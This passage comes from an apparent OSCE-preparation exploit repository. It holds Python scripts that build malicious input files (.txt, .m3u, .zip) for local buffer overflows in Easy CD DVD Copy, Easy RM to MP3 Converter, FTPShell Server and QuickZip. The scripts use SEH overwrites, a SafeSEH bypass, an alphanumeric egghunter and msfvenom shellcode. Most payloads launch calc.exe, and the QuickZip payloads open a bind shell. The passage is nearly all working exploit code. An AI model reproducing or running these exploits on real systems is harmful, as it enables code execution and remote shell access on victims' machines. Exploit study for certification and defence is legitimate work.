shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"

buffer  = "A" * 988                      # Junk
buffer += "\xeb\x14\x90\x90"             #     + nSEH (Jump Code)
buffer += struct.pack('<L', 0x10037b11)  #                       + SEH (pop ebx # pop eax # ret  | [SkinMagic.dll])
buffer += "\x90" * 50                    #                                                                         + NOP
buffer += shellcode                      #                                                                              + shellcode 
buffer += "\x90" * 50                    #                                                                                         + NOP

try:
	f=open("OpenMe.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

================================================
FILE: Local Buffer Overflow/EasyCDDVDCopyv1.3.24/readme.md
================================================
### Easy CD DVD Copy v1.3.24
Structured Exception Handler (SEH) chain overwrite exploit found during my prepperation for OSCE, see the link [EDB-ID: 44337](https://www.exploit-db.com/exploits/44337/)

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/EasyCDDVDCopyv1.3.24/PoC.jpg)


================================================
FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/Exploit.py
================================================
#!/usr/share/python

import struct
import time
import socket

def BufferOverflow():
	
	#------------------------------------------------------------------------------#
	# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload #
	#------------------------------------------------------------------------------#

	shellcode =  ""
	shellcode += "\xdd\xc6\xd9\x74\x24\xf4\x5b\xbf\xd5\xc2\x64\xc2"
	shellcode += "\x2b\xc9\xb1\x31\x83\xeb\xfc\x31\x7b\x14\x03\x7b"
	shellcode += "\xc1\x20\x91\x3e\x01\x26\x5a\xbf\xd1\x47\xd2\x5a"
	shellcode += "\xe0\x47\x80\x2f\x52\x78\xc2\x62\x5e\xf3\x86\x96"
	shellcode += "\xd5\x71\x0f\x98\x5e\x3f\x69\x97\x5f\x6c\x49\xb6"
	shellcode += "\xe3\x6f\x9e\x18\xda\xbf\xd3\x59\x1b\xdd\x1e\x0b"
	shellcode += "\xf4\xa9\x8d\xbc\x71\xe7\x0d\x36\xc9\xe9\x15\xab"
	shellcode += "\x99\x08\x37\x7a\x92\x52\x97\x7c\x77\xef\x9e\x66"
	shellcode += "\x94\xca\x69\x1c\x6e\xa0\x6b\xf4\xbf\x49\xc7\x39"
	shellcode += "\x70\xb8\x19\x7d\xb6\x23\x6c\x77\xc5\xde\x77\x4c"
	shellcode += "\xb4\x04\xfd\x57\x1e\xce\xa5\xb3\x9f\x03\x33\x37"
	shellcode += "\x93\xe8\x37\x1f\xb7\xef\x94\x2b\xc3\x64\x1b\xfc"
	shellcode += "\x42\x3e\x38\xd8\x0f\xe4\x21\x79\xf5\x4b\x5d\x99"
	shellcode += "\x56\x33\xfb\xd1\x7a\x20\x76\xb8\x10\xb7\x04\xc6"
	shellcode += "\x56\xb7\x16\xc9\xc6\xd0\x27\x42\x89\xa7\xb7\x81"
	shellcode += "\xee\x58\xf2\x88\x46\xf1\x5b\x59\xdb\x9c\x5b\xb7"
	shellcode += "\x1f\x99\xdf\x32\xdf\x5e\xff\x36\xda\x1b\x47\xaa"
	shellcode += "\x96\x34\x22\xcc\x05\x34\x67\xaf\xc8\xa6\xeb\x1e"
	shellcode += "\x6f\x4f\x89\x5e"
	
	#----------------------------#
	#           Payload          #
	#----------------------------#
	# buffer = AAA padding       # |---------------------------------------------------------+
	# buffer = EIP overwrite     # |--------| WinXP SP3 Pro : "\xFF\xE4" | [USER32.dll] |----|-+
	# buffer = NOP sled          # |---------------------------------------------------------|-|-+
	# buffer = Shellcode         # |---------------------------------------------------------|-|-|-+
	# buffer = BBB padding       # |---------------------------------------------------------|-|-|-|-+
	#----------------------------#                                                           | | | | |
	#                                                                                        | | | | |
	buffer  = "A" * 26065                              # <-----------------------------------+ | | | |
	buffer += struct.pack('<L', 0x7e47bcaf)            # <-------------------------------------+ | | |
	buffer += "\x90" * 40                              # <---------------------------------------+ | |
	buffer += shellcode                                # <-----------------------------------------+ |
	buffer += "B" * (30000-26065-4-40-len(shellcode))  # <-------------------------------------------+
	 
	try:
		f=open("OpenMe.m3u","w")
		print "[+] Creating %s bytes evil payload.." %len(buffer)
		time.sleep(1)
		f.write(buffer)
		f.close()
		print "[+] File created. Load that shit up!"
	except:
		print "File cannot be created"
	    
def main():
	print (
	'''
	+-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+
	|E|a|s|y| |R|M| |t|o| |M|P|3| |C|o|n|v|e|r|t|e|r| |v|2|.|7|.|3|.|7|0|0|
	+-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+
			+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
			|L|o|c|a|l| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
			+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
	'''
    )
	BufferOverflow()
		
if __name__ == '__main__':
	main()

================================================
FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/readme.md
================================================
### Easy RM to MP3 Converter v2.7.3.700

Yet another vanilla save pointer overwirte (EIP) to pop calc.exe, nothing fancy.

![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/EasyRMtoMP3Converterv2.7.3.700/PoC.JPG)


================================================
FILE: Local Buffer Overflow/FTPShellServerv6.80/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title      : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass)                      #
# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
# Vendor Homepage    : http://www.ftpshell.com/                                                            #
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm                                          #
# Tested on          : Windows XP Professional SP3                                                         #
# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass #
#----------------------------------------------------------------------------------------------------------#

'''
Notes:
=====
* All loaded modules including base binary are compiled with /SAFESEH
* Null byte '\x00' get mangled by the program and end up as space '\x20' 
'''

#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "\x00\x0a\x0d" -f python -v shellcode
#Payload size: 447 bytes
shellcode =  ""
shellcode += "\x89\xe0\xd9\xed\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79"
shellcode += "\x6c\x7a\x48\x4c\x42\x67\x70\x73\x30\x57\x70\x43"
shellcode += "\x50\x4d\x59\x4b\x55\x36\x51\x59\x50\x61\x74\x4e"
shellcode += "\x6b\x56\x30\x46\x50\x6e\x6b\x61\x42\x56\x6c\x6c"
shellcode += "\x4b\x72\x72\x32\x34\x6e\x6b\x61\x62\x37\x58\x76"
shellcode += "\x6f\x38\x37\x72\x6a\x54\x66\x55\x61\x4b\x4f\x4e"
shellcode += "\x4c\x45\x6c\x30\x61\x71\x6c\x35\x52\x46\x4c\x45"
shellcode += "\x70\x6b\x71\x58\x4f\x44\x4d\x77\x71\x69\x57\x7a"
shellcode += "\x42\x6c\x32\x63\x62\x46\x37\x4e\x6b\x62\x72\x62"
shellcode += "\x30\x6e\x6b\x53\x7a\x47\x4c\x4c\x4b\x52\x6c\x74"
shellcode += "\x51\x52\x58\x6b\x53\x62\x68\x77\x71\x5a\x71\x62"
shellcode += "\x71\x4e\x6b\x76\x39\x57\x50\x36\x61\x4a\x73\x6e"
shellcode += "\x6b\x47\x39\x56\x78\x59\x73\x65\x6a\x52\x69\x6e"
shellcode += "\x6b\x57\x44\x6c\x4b\x67\x71\x4e\x36\x34\x71\x6b"
shellcode += "\x4f\x6e\x4c\x5a\x61\x58\x4f\x74\x4d\x76\x61\x4b"
shellcode += "\x77\x70\x38\x69\x70\x52\x55\x38\x76\x75\x53\x51"
shellcode += "\x6d\x59\x68\x65\x6b\x73\x4d\x65\x74\x43\x45\x78"
shellcode += "\x64\x61\x48\x6c\x4b\x36\x38\x67\x54\x76\x61\x49"
shellcode += "\x43\x73\x56\x4c\x4b\x76\x6c\x50\x4b\x6e\x6b\x31"
shellcode += "\x48\x77\x6c\x43\x31\x79\x43\x6e\x6b\x43\x34\x4c"
shellcode += "\x4b\x53\x31\x7a\x70\x4d\x59\x37\x34\x66\x44\x67"
shellcode += "\x54\x33\x6b\x53\x6b\x50\x61\x30\x59\x31\x4a\x63"
shellcode += "\x61\x69\x6f\x59\x70\x71\x4f\x51\x4f\x33\x6a\x6e"
shellcode += "\x6b\x76\x72\x6a\x4b\x6e\x6d\x33\x6d\x43\x5a\x63"
shellcode += "\x31\x6c\x4d\x6c\x45\x4c\x72\x47\x70\x45\x50\x33"
shellcode += "\x30\x56\x30\x53\x58\x74\x71\x4e\x6b\x62\x4f\x4f"
shellcode += "\x77\x59\x6f\x6b\x65\x6f\x4b\x4c\x30\x4f\x45\x6d"
shellcode += "\x72\x43\x66\x62\x48\x39\x36\x6a\x35\x6f\x4d\x4d"
shellcode += "\x4d\x59\x6f\x5a\x75\x47\x4c\x53\x36\x63\x4c\x55"
shellcode += "\x5a\x4f\x70\x49\x6b\x6d\x30\x31\x65\x53\x35\x6d"
shellcode += "\x6b\x62\x67\x37\x63\x30\x72\x62\x4f\x32\x4a\x55"
shellcode += "\x50\x70\x53\x79\x6f\x6e\x35\x31\x73\x71\x71\x30"
shellcode += "\x6c\x71\x73\x46\x4e\x43\x55\x51\x68\x35\x35\x35"
shellcode += "\x50\x41\x41"

buffer  = '\xcc' * 2101                      # filler to nSEH offset
buffer += '\xeb\x06\x90\x90'                 # nSEH | hop over SEH 
buffer += '\x18\x05\xfc\x7f'                 # SEH  | 0x7ffc0518 : pop edi # pop edi # ret  [SafeSEH Bypass]
buffer += '\x90' * 10                        # nops sled
buffer += shellcode                          # calc.exe
buffer += '\xcc' * (5000-2101-4-4-10-len(shellcode))

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e


================================================
FILE: Local Buffer Overflow/FTPShellServerv6.80/README.md
================================================
### FTPShell Server v6.80
Structured Exception Handler (SEH) overwrite exploit found during my prep to take on OSCE, had to look for an address outside the range of loaded modules (including base image) in order to bypass `safeSEH`. See the link [EDB-ID: 44713](https://www.exploit-db.com/exploits/44713/)

<p align="center">
  <img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/FTPShellServerv6.80/PoC.gif">
</p>


================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/Egg Hunter/Exploit.py
================================================
#!/usr/bin/python

#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode 
#Payload size: 710 bytes
shellcode =  "T00WT00W"
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x59\x6c\x58\x68\x4c\x42\x53\x30"
shellcode += "\x35\x50\x65\x50\x55\x30\x6d\x59\x38\x65\x56\x51"
shellcode += "\x79\x50\x73\x54\x6c\x4b\x46\x30\x36\x50\x6c\x4b"
shellcode += "\x56\x32\x44\x4c\x6e\x6b\x70\x52\x44\x54\x4c\x4b"
shellcode += "\x44\x32\x44\x68\x66\x6f\x68\x37\x33\x7a\x47\x56"
shellcode += "\x74\x71\x4b\x4f\x4c\x6c\x55\x6c\x53\x51\x51\x6c"
shellcode += "\x76\x62\x44\x6c\x67\x50\x4b\x71\x68\x4f\x44\x4d"
shellcode += "\x67\x71\x4f\x37\x59\x72\x7a\x52\x62\x72\x76\x37"
shellcode += "\x4e\x6b\x52\x72\x74\x50\x6e\x6b\x62\x6a\x57\x4c"
shellcode += "\x6c\x4b\x50\x4c\x77\x61\x30\x78\x38\x63\x67\x38"
shellcode += "\x76\x61\x5a\x71\x52\x71\x6c\x4b\x51\x49\x77\x50"
shellcode += "\x45\x51\x49\x43\x6e\x6b\x71\x59\x76\x78\x4d\x33"
shellcode += "\x37\x4a\x37\x39\x6c\x4b\x55\x64\x6e\x6b\x36\x61"
shellcode += "\x4b\x66\x34\x71\x49\x6f\x6e\x4c\x4b\x71\x78\x4f"
shellcode += "\x44\x4d\x73\x31\x48\x47\x64\x78\x6b\x50\x74\x35"
shellcode += "\x68\x76\x54\x43\x71\x6d\x69\x68\x45\x6b\x63\x4d"
shellcode += "\x54\x64\x52\x55\x4d\x34\x76\x38\x6e\x6b\x32\x78"
shellcode += "\x56\x44\x67\x71\x48\x53\x52\x46\x4e\x6b\x76\x6c"
shellcode += "\x30\x4b\x6c\x4b\x62\x78\x67\x6c\x47\x71\x6b\x63"
shellcode += "\x6e\x6b\x77\x74\x4c\x4b\x66\x61\x6a\x70\x4b\x39"
shellcode += "\x53\x74\x76\x44\x56\x44\x63\x6b\x51\x4b\x35\x31"
shellcode += "\x76\x39\x62\x7a\x33\x61\x39\x6f\x49\x70\x43\x6f"
shellcode += "\x61\x4f\x62\x7a\x6c\x4b\x62\x32\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x70\x68\x76\x53\x37\x42\x45\x50\x45\x50"
shellcode += "\x63\x58\x74\x37\x72\x53\x46\x52\x61\x4f\x66\x34"
shellcode += "\x30\x68\x70\x4c\x71\x67\x74\x66\x36\x67\x6b\x4f"
shellcode += "\x38\x55\x4f\x48\x6c\x50\x33\x31\x75\x50\x67\x70"
shellcode += "\x34\x69\x4b\x74\x31\x44\x62\x70\x42\x48\x54\x69"
shellcode += "\x4b\x30\x62\x4b\x63\x30\x39\x6f\x78\x55\x33\x5a"
shellcode += "\x46\x68\x46\x39\x66\x30\x38\x62\x4b\x4d\x61\x50"
shellcode += "\x30\x50\x47\x30\x46\x30\x65\x38\x68\x6a\x54\x4f"
shellcode += "\x69\x4f\x6b\x50\x59\x6f\x6b\x65\x6f\x67\x55\x38"
shellcode += "\x44\x42\x65\x50\x66\x71\x63\x6c\x4b\x39\x4a\x46"
shellcode += "\x33\x5a\x42\x30\x32\x76\x43\x67\x55\x38\x6a\x62"
shellcode += "\x69\x4b\x56\x57\x33\x57\x49\x6f\x78\x55\x73\x67"
shellcode += "\x31\x78\x6e\x57\x58\x69\x57\x48\x39\x6f\x79\x6f"
shellcode += "\x69\x45\x43\x67\x70\x68\x54\x34\x7a\x4c\x45\x6b"
shellcode += "\x78\x61\x69\x6f\x4b\x65\x63\x67\x6a\x37\x65\x38"
shellcode += "\x42\x55\x52\x4e\x72\x6d\x30\x61\x79\x6f\x6b\x65"
shellcode += "\x35\x38\x52\x43\x30\x6d\x71\x74\x67\x70\x4b\x39"
shellcode += "\x6b\x53\x31\x47\x62\x77\x31\x47\x76\x51\x49\x66"
shellcode += "\x33\x5a\x57\x62\x31\x49\x73\x66\x6d\x32\x6b\x4d"
shellcode += "\x53\x56\x69\x57\x73\x74\x67\x54\x55\x6c\x35\x51"
shellcode += "\x45\x51\x6c\x4d\x73\x74\x51\x34\x52\x30\x5a\x66"
shellcode += "\x45\x50\x42\x64\x71\x44\x42\x70\x32\x76\x53\x66"
shellcode += "\x50\x56\x47\x36\x36\x36\x50\x4e\x52\x76\x32\x76"
shellcode += "\x50\x53\x73\x66\x62\x48\x43\x49\x4a\x6c\x37\x4f"
shellcode += "\x6c\x46\x79\x6f\x4b\x65\x4c\x49\x59\x70\x30\x4e"
shellcode += "\x42\x76\x32\x66\x39\x6f\x50\x30\x51\x78\x74\x48"
shellcode += "\x6f\x77\x45\x4d\x35\x30\x49\x6f\x4e\x35\x6d\x6b"
shellcode += "\x6c\x30\x58\x35\x4e\x42\x46\x36\x73\x58\x6f\x56"
shellcode += "\x6f\x65\x6f\x4d\x4f\x6d\x69\x6f\x7a\x75\x65\x6c"
shellcode += "\x37\x76\x71\x6c\x45\x5a\x6d\x50\x79\x6b\x4b\x50"
shellcode += "\x33\x45\x46\x65\x6d\x6b\x57\x37\x56\x73\x64\x32"
shellcode += "\x52\x4f\x63\x5a\x47\x70\x51\x43\x49\x6f\x4a\x75"
shellcode += "\x41\x41"

####################### ZIP File Structure ######################## 
###################################################################
######################## Local File Header ########################
LocalFileHeader  = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00'         # general purpose bit flag
LocalFileHeader += '\x00\x00'         # compression method
LocalFileHeader += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00'     # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes 
LocalFileHeader += '\x00\x00'         # extra field length
LocalFileHeader += '\x00'             # file name
#LocalFileHeader += '\x00'             # extra filed 
################## Central Directory File Header ##################
CDFileHeader     = '\x50\x4b\x01\x02' # cd file header signature 
CDFileHeader    += '\x14\x00'         # version made by 0x14 = 20 -> 2.0
CDFileHeader    += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader    += '\x00\x00'         # general purpose bit flag
CDFileHeader    += '\x00\x00'         # compression method 
CDFileHeader    += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader    += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader    += '\x00\x00\x00\x00' # CRC-32
CDFileHeader    += '\x00\x00\x00\x00' # compressed size
CDFileHeader    += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader    += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes
CDFileHeader    += '\x00\x00'         # extra field length
CDFileHeader    += '\x00\x00'         # file comment length 
CDFileHeader    += '\x00\x00'         # disk number where file starts
CDFileHeader    += '\x01\x00'         # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader    += '\x24\x00\x00\x00' # external file attributes 
CDFileHeader    += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader    += '\x00'             # file name
#CDFileHeader    += '\x00'             # extra field 
#CDFileHeader    += '\x00'             # file comment 
################ End of Central Directory Record ##################
EOCDRHeader      = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader     += '\x00\x00'         # number of this disk 
EOCDRHeader     += '\x00\x00'         # disk where central directory starts 
EOCDRHeader     += '\x01\x00'         # number of central directory records on this disk 
EOCDRHeader     += '\x01\x00'         # total number of central directory records 
EOCDRHeader     += '\x12\x10\x00\x00' # size of central directory (4114 bytes)
EOCDRHeader     += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive 
EOCDRHeader     += '\x00\x00'         # comment length 
#EOCDRHeader     += '\x00'             # comment 

#root@kali:~# msfvenom -a x86 --platform windows -e x86/alpha_mixed BufferRegister=EAX -b '\x00' < /opt/OSCE/Tools/EggHunter.bin 
#Payload size: 118 bytes
EggHunter = 'PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISVoqkzYovoPBCbbJDBqHzm6NuldECj3DhoLxBtdpfPaGNkijLoT5kZlobUywkOxgAA'

Evil  = '\x41' * 10                   # filler to egghunter  
Evil += EggHunter                     # hunt baby hunt!
Evil += '\x42' * 47                   # filler to the start of hand crafted shellcode
Evil += '\x54'                        # PUSH ESP                * save stack pointer 
Evil += '\x5F'                        # POP EDI                 * point eax to where we want to decode otherwise bad shellcode 
Evil += '\x54'                        # push   esp
Evil += '\x58'                        # pop    eax
Evil += '\x05\x21\x13\x11\x11'        # add    eax,0x11111321
Evil += '\x05\x21\x16\x11\x11'        # add    eax,0x11111621
Evil += '\x2d\x06\x23\x22\x22'        # sub    eax,0x22222306 
Evil += '\x50'                        # PUSH EAX
Evil += '\x5C'                        # POP ESP                 * move eax value into stack pointer  
Evil += '\x25\x4A\x4D\x4E\x55'        # AND EAX,554E4D4A        * decode 'mov esp, edi;jmp eax'
Evil += '\x25\x35\x32\x31\x2A'        # AND EAX,2A313235
Evil += '\x05\x44\x76\x77\x61'        # ADD EAX,61777644
Evil += '\x05\x44\x65\x66\x51'        # ADD EAX,51666544
Evil += '\x05\x34\x54\x55\x61'        # ADD EAX,61555434
Evil += '\x2D\x33\x33\x33\x33'        # SUB EAX,33333333
Evil += '\x50'                        # PUSH EAX
Evil += '\x25\x4A\x4D\x4E\x55'        # AND EAX,554E4D4A        * point eax to egg hunter shellcode 
Evil += '\x25\x35\x32\x31\x2A'        # AND EAX,2A313235
Evil += '\x05\x71\x75\x11\x11'        # ADD EAX,11117571
Evil += '\x05\x71\x75\x11\x11'        # ADD EAX,11117571
Evil += '\x05\x11\x35\x11\x11'        # ADD EAX,11113511
Evil += '\x2D\x13\x25\x21\x33'        # SUB EAX,33212513
Evil += '\x41' * (294-10-len(EggHunter)-47-82)
Evil += '\x75\x9f\x74\x9f'            # nSEH JZ & JNZ (aka jump net)
Evil += '\x41\x16\x40\x00'            # SEH pop esi,pop ebx, retn in QuickZip.exe 
Evil += shellcode                     # egg + shellcode     
Evil += '\x41' * (4064-294-4-4-len(shellcode))
Evil += '.txt'

buffer  = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader  

try:
	f=open("Evil.zip","w")
	print "[+] Creating %s bytes evil payload.." %len(Evil)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except Exception as e:
	print e

================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/OS Dependent/Exploit.py
================================================
#!/usr/bin/python

# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode 
# Payload size: 710 bytes
shellcode =  ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x69\x78\x4c\x42\x73\x30"
shellcode += "\x37\x70\x57\x70\x55\x30\x6f\x79\x49\x75\x74\x71"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x76\x30\x64\x70\x6e\x6b"
shellcode += "\x62\x72\x36\x6c\x4e\x6b\x76\x32\x34\x54\x6e\x6b"
shellcode += "\x44\x32\x74\x68\x66\x6f\x68\x37\x32\x6a\x37\x56"
shellcode += "\x35\x61\x6b\x4f\x4e\x4c\x65\x6c\x45\x31\x31\x6c"
shellcode += "\x43\x32\x64\x6c\x75\x70\x79\x51\x4a\x6f\x66\x6d"
shellcode += "\x76\x61\x6b\x77\x4d\x32\x7a\x52\x43\x62\x73\x67"
shellcode += "\x6e\x6b\x61\x42\x34\x50\x6e\x6b\x42\x6a\x75\x6c"
shellcode += "\x4c\x4b\x42\x6c\x57\x61\x63\x48\x6a\x43\x57\x38"
shellcode += "\x73\x31\x58\x51\x73\x61\x4c\x4b\x66\x39\x47\x50"
shellcode += "\x75\x51\x4e\x33\x6e\x6b\x37\x39\x32\x38\x49\x73"
shellcode += "\x74\x7a\x67\x39\x4e\x6b\x50\x34\x4e\x6b\x35\x51"
shellcode += "\x6e\x36\x56\x51\x39\x6f\x6c\x6c\x79\x51\x38\x4f"
shellcode += "\x74\x4d\x57\x71\x39\x57\x56\x58\x79\x70\x31\x65"
shellcode += "\x49\x66\x44\x43\x61\x6d\x4c\x38\x45\x6b\x63\x4d"
shellcode += "\x45\x74\x72\x55\x7a\x44\x62\x78\x6e\x6b\x76\x38"
shellcode += "\x47\x54\x76\x61\x59\x43\x70\x66\x4e\x6b\x36\x6c"
shellcode += "\x70\x4b\x4e\x6b\x71\x48\x75\x4c\x76\x61\x4e\x33"
shellcode += "\x6c\x4b\x56\x64\x6e\x6b\x46\x61\x7a\x70\x6b\x39"
shellcode += "\x71\x54\x45\x74\x57\x54\x43\x6b\x33\x6b\x75\x31"
shellcode += "\x30\x59\x61\x4a\x30\x51\x79\x6f\x39\x70\x63\x6f"
shellcode += "\x43\x6f\x30\x5a\x6c\x4b\x52\x32\x48\x6b\x6c\x4d"
shellcode += "\x43\x6d\x30\x68\x67\x43\x47\x42\x35\x50\x77\x70"
shellcode += "\x53\x58\x34\x37\x32\x53\x64\x72\x43\x6f\x46\x34"
shellcode += "\x31\x78\x72\x6c\x44\x37\x65\x76\x63\x37\x69\x6f"
shellcode += "\x6e\x35\x4c\x78\x6e\x70\x53\x31\x57\x70\x65\x50"
shellcode += "\x47\x59\x6a\x64\x71\x44\x42\x70\x70\x68\x44\x69"
shellcode += "\x6b\x30\x42\x4b\x67\x70\x4b\x4f\x38\x55\x33\x5a"
shellcode += "\x57\x78\x62\x79\x32\x70\x38\x62\x4b\x4d\x47\x30"
shellcode += "\x36\x30\x73\x70\x50\x50\x62\x48\x7a\x4a\x74\x4f"
shellcode += "\x6b\x6f\x39\x70\x69\x6f\x78\x55\x6a\x37\x32\x48"
shellcode += "\x66\x62\x73\x30\x34\x51\x51\x4c\x4c\x49\x5a\x46"
shellcode += "\x31\x7a\x42\x30\x31\x46\x66\x37\x55\x38\x68\x42"
shellcode += "\x39\x4b\x44\x77\x51\x77\x49\x6f\x4a\x75\x32\x77"
shellcode += "\x51\x78\x38\x37\x6a\x49\x75\x68\x69\x6f\x49\x6f"
shellcode += "\x6a\x75\x70\x57\x71\x78\x43\x44\x68\x6c\x67\x4b"
shellcode += "\x49\x71\x69\x6f\x69\x45\x51\x47\x6c\x57\x31\x78"
shellcode += "\x54\x35\x42\x4e\x72\x6d\x71\x71\x59\x6f\x39\x45"
shellcode += "\x45\x38\x33\x53\x72\x4d\x53\x54\x55\x50\x4c\x49"
shellcode += "\x6b\x53\x42\x77\x51\x47\x76\x37\x70\x31\x79\x66"
shellcode += "\x53\x5a\x32\x32\x73\x69\x66\x36\x49\x72\x39\x6d"
shellcode += "\x70\x66\x48\x47\x51\x54\x47\x54\x35\x6c\x35\x51"
shellcode += "\x56\x61\x6c\x4d\x47\x34\x34\x64\x32\x30\x7a\x66"
shellcode += "\x35\x50\x43\x74\x73\x64\x46\x30\x70\x56\x50\x56"
shellcode += "\x32\x76\x43\x76\x33\x66\x50\x4e\x62\x76\x43\x66"
shellcode += "\x73\x63\x32\x76\x70\x68\x62\x59\x58\x4c\x47\x4f"
shellcode += "\x6b\x36\x39\x6f\x4a\x75\x6c\x49\x69\x70\x72\x6e"
shellcode += "\x52\x76\x33\x76\x39\x6f\x76\x50\x52\x48\x46\x68"
shellcode += "\x6e\x67\x47\x6d\x33\x50\x79\x6f\x79\x45\x6f\x4b"
shellcode += "\x78\x70\x6e\x55\x79\x32\x56\x36\x73\x58\x6e\x46"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x59\x6f\x39\x45\x65\x6c"
shellcode += "\x77\x76\x61\x6c\x47\x7a\x4f\x70\x79\x6b\x69\x70"
shellcode += "\x62\x55\x54\x45\x6f\x4b\x51\x57\x56\x73\x64\x32"
shellcode += "\x62\x4f\x52\x4a\x37\x70\x43\x63\x4b\x4f\x49\x45"
shellcode += "\x41\x41"

####################### ZIP File Structure ######################## 
###################################################################
######################## Local File Header ########################
